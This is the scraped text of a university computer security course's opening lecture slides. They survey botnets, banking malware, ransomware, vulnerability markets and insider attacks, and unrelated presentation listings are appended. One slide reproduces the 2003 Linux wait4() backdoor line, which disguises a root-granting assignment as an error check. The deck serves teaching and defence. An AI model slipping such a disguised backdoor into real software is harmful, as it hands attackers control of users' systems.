Computer Security - cs155.stanford.edu

Computer Security - cs155.stanford.edu

https://cs155.Stanford.edu CS155 Computer Security Course overview Dan Boneh The computer security problem Lots of buggy software Social engineering is very effective Money can be made from finding and exploiting vulns.

1. Marketplace for vulnerabilities 2. Marketplace for owned machines (PPI) 3. Many methods to profit from owned machines current state of computer security Dan Boneh source: https://www.cvedetails.com/top-50-products.php?year=2018 Dan Boneh Vulnerable applications being exploited

Office Android Java Browser Source: Kaspersky Security Bulletin 2017 Dan Boneh Introduction

Sample attacks Dan Boneh Why own client machines: 1. IP address and bandwidth stealing Attackers goal: look like a random Internet user Use the IP address of infected machine or phone for: Spam (e.g. the storm botnet) Spamalytics: 1:12M pharma spams leads to purchase 1:260K greeting card spams leads to infection

Denial of Service: Services: 1 hour (20$), 24 hours (100$) Click fraud (e.g. Clickbot.a) Dan Boneh Why own machines: 2. Steal user credentials, crypto miners keylog for banking passwords, web passwords, gaming pwds. Example: SilentBanker

(and many like it) User requests login page Malware injects Javascript When user submits information, also sent to attacker Man-in-the-Browser (MITB)

Bank sends login page needed to log in Bank Similar mechanism used by Zeus botnet Dan Boneh Lots of financial malware records banking passwords

via keylogger spread via spam email and hacked web sites maintains access to PC for future installs Source: Kaspersky Security Bulletin 2017 Dan Boneh Users attacked: stats

300,000 users/month worldwide Source: Kaspersky Security Bulletin 2015 A worldwide problem Dan Boneh Why own machines: 3. Ransomware a worldwide problem Worm spreads via a vuln. in SMB (port 445)

Apr. 14, 2017: Eternalblue vuln. released by ShadowBrokers May 12, 2017: Worm detected (3 weeks to weaponize) Dan Boneh

Dan Boneh WannaCry ransomware Ransomware in 2017: # users attacked Source: Kaspersky Security Bulletin 2017 Dan Boneh Why own machines: 4. Spread to isolated systems

Example: Stuxtnet Windows infection Siemens PCS 7 SCADA control software on Windows Siemens device controller on isolated network More on this later in course Dan Boneh Server-side attacks Data theft: credit card numbers, intellectual property Example: Equifax (July 2017), 143M customer data impacted Exploited known vulnerability in Apache Struts (RCE)

Many similar (smaller) attacks since 2000 Political motivation: DNC, Tunisia Facebook (Feb. 2011), GitHub (Mar. 2015) Infect visiting users Dan Boneh

Infecting visiting users: Mpack PHP-based tools installed on compromised web sites Embedded as an iframe on infected page Infects browsers that visit site Features management console provides stats on infection rates Sold for several 100$ Customer care can be purchased, one-year support contract Impact: 500,000 infected sites

(compromised via SQL injection) Several defenses: e.g. Google safe browsing Dan Boneh Types of data stolen Source: California breach notification report, 2015 (2012-2015)

Dan Boneh How companies lose data insider misuse/attack 7.00% malware/hacking insider error 17.00% 54.00%

22.00% lost/stolen laptops How do we have this data? Source: California breach notification report, 2016 Dan Boneh Insider attacks: example Hidden trap door in Linux (nov 2003) Allows attacker to take over a computer Practically undetectable change (uncovered via CVS logs)

Inserted line in wait4() if ((options == (__WCLONE|__WALL)) && (current->uid = 0)) retval = -EINVAL; Looks like a standard error check, but See: http://lwn.net/Articles/57135/ Dan Boneh Many more examples Access to SIPRnet and a CD-RW: 260,000 cables Wikileaks

SysAdmin for city of SF government. Changed passwords, locking out city from router access Inside logic bomb took down 2000 UBS servers Can security technology help? Dan Boneh Introduction The Marketplace for Vulnerabilities Dan Boneh

Marketplace for Vulnerabilities Option 1: bug bounty programs (many) Google Vulnerability Reward Program: up to $31,337 Microsoft Bounty Program: up to $100K Apple Bug Bounty program: up to $200K (secure boot firmware) Pwn2Own competition: $15K Option 2: Zerodium: up to $2M for iOS, many others $500K for Android

(2019) Dan Boneh Example: Mozilla Dan Boneh Marketplace for Vulnerabilities RCE: remote code execution LPE: local privilege escalation

SBX: sandbox escape Source: Zerodium payouts Dan Boneh Marketplace for Vulnerabilities RCE: remote code execution LPE: local privilege escalation SBX: sandbox escape RJB: remote jailbreak

Source: Zerodium payouts Dan Boneh Marketplace for owned machines clients Pay-per-install (PPI) services PPI operation: 1. Own victims machine 2. Download and install clients code 3. Charge client

spam bot keylogger PPI service Victims Source: Cabalerro et al. (www.icir.org/vern/papers/ppi-usesec11.pdf) Dan Boneh

Marketplace for owned machines clients Cost: US spam bot keylogger - 100-180$ / 1000 machines PPI service

Asia - 7-8$ / 1000 machines Victims Source: Cabalerro et al. (www.icir.org/vern/papers/ppi-usesec11.pdf) Dan Boneh This course Goals: Be aware of exploit techniques Learn to defend and avoid common exploits

Learn to architect secure systems Dan Boneh This course Part 1: basics (architecting for security) Securing apps, OS, and legacy code Isolation, authentication, and access control Part 2: Web security (defending against a web attacker) Building robust web sites, understand the browser security model Part 3: network security (defending against a network attacker) Monitoring and architecting secure networks.

Part 4: securing mobile applications Dan Boneh Dont try this at home ! Dan Boneh Ken Thompsons clever Trojan Dan Boneh

Recently Viewed Presentations

  • Read the OpenCDISC report - Pharmasug

    Read the OpenCDISC report - Pharmasug

    A message may caused by different reasons, we must check the detail to prevent hidden type II issue. Visit name of unplaned visits are not included in TV, already Explained in SDRG. Visitnum not given for some planed visit, data...
  • Myelodysplastic Syndromes: Principles, Practice and State-of ...

    Myelodysplastic Syndromes: Principles, Practice and State-of ...

    * * Decitabine Phase III MDS Trial Study Design Open-label, multicenter, 1:1 randomized study IPSS: Int-1, Int-2, and high-risk MDS patients eligible Primary end points: response, time to AML/death IWG response criteria utilized for assessment Decitabine + supportive care 15...
  • What is Joy? - Rose Avenue

    What is Joy? - Rose Avenue

    In Greek, from the same root word as grace. Joy and rejoicing found 120+ times in NTThanks(giving) - 50+ times. What is Joy? As Christians, joy is more than just being happy, or at some fun place. It is a...
  • Welcome To… Okanagan Mission Secondary - okm.sd23.bc.ca

    Welcome To… Okanagan Mission Secondary - okm.sd23.bc.ca

    All parents and guardians of students registered at Okanagan Mission Secondary are able to participate as a member of the OKM PAC. Any parent and guardian of students registered in SD23 are also invited to attend COPAC, School Board and...
  • Pay for Performance A Consultants Viewpoint Kenneth E.

    Pay for Performance A Consultants Viewpoint Kenneth E.

    CBM Environmental Services, Inc. ... to legislature that money is going for cleanup Client's Perception of Pay for Performance Benefits Contract is easy to understand and quantify State personnel provide oversight Regulators can demonstrate that $ are going for cleanup...
  • Energy Loss of Charged Particles - University of Missouri ...

    Energy Loss of Charged Particles - University of Missouri ...

    Energy loss of charged particles (collision loss) Inelastic collisions with atomic electrons of the material and elastic scattering due to nuclei. Collision with atomic electrons are far more probable and it's the main component of energy loss by collisions.
  • Breaking It Down-Building It Up: The Health System

    Breaking It Down-Building It Up: The Health System

    The contents of this presentation represent the ... and pay plans for physicians within alignment structures will be continuing to move away from fee-for-volume to fee-for-value. ... Consortium of ...
  • Modifications to the Kinetic Theory as Applied to Dense ...

    Modifications to the Kinetic Theory as Applied to Dense ...

    Modified Kinetic Theory for Multi-body Collisions. Based on . DEM simulation results with IHSs . the energy dissipation rate in the Kinetic Theory was modified as follows: Note: K is . the ratio of the kinetic energy to the total...